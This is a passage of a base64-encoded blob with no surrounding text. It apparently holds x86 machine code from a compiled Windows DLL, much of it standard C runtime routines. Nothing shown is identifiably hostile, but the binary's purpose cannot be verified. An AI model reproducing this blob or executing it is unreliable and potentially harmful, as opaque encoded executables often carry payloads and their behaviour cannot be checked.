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zMzMzMzMzMzMzMzMi1QkBItMJAj3wgMAAAB1PIsCOgF1LgrAdCY6YQF1JQrkdB3B6BA6QQJ1GQrAdBE6YQN1EIPBBIPCBArkddKL/zPAw5AbwNHgg8ABw/fCAQAAAHQYigKDwgE6AXXng8EBCsB03PfCAgAAAHSkZosCg8ICOgF1zgrAdMY6YQF1xQrkdL2DwQLriIv/VYvsg30IAHUV6Gjz///HABYAAADolvj//4PI/13D/3UIagD/NSCgABD/FeBgABBdw4v/VYvsVot1CIX2D4RjAwAA/3YE6DLU////dgjoKtT///92DOgi1P///3YQ6BrU////dhToEtT///92GOgK1P///zboA9T///92IOj70////3Yk6PPT////dijo69P///92LOjj0////3Yw6NvT////djTo09P///92HOjL0////3Y46MPT////djzou9P//4PEQP92QOiw0////3ZE6KjT////dkjooNP///92TOiY0////3ZQ6JDT////dlToiNP///92WOiA0////3Zc6HjT////dmDocNP///92ZOho0////3Zo6GDT////dmzoWNP///92cOhQ0////3Z06EjT////dnjoQNP///92fOg40///g8RA/7aAAAAA6CrT////toQAAADoH9P///+2iAAAAOgU0////7aMAAAA6AnT////tpAAAADo/tL///+2lAAAAOjz0v///7aYAAAA6OjS////tpwAAADo3dL///+2oAAAAOjS0v///7akAAAA6MfS////tqgAAADovNL///+2vAAAAOix0v///7bAAAAA6KbS////tsQAAADom9L///+2yAAAAOiQ0v///7bMAAAA6IXS//+DxED/ttAAAADod9L///+2uAAAAOhs0v///7bYAAAA6GHS////ttwAAADoVtL///+24AAAAOhL0v///7bkAAAA6EDS////tugAAADoNdL///+27AAAAOgq0v///7bUAAAA6B/S////tvAAAADoFNL///+29AAAAOgJ0v///7b4AAAA6P7R////tvwAAADo89H///+2AAEAAOjo0f///7YEAQAA6N3R////tggBAADo0tH//4PEQP+2DAEAAOjE0f///7YQAQAA6LnR////thQBAADortH///+2GAEAAOij0f///7YcAQAA6JjR////tiABAADojdH/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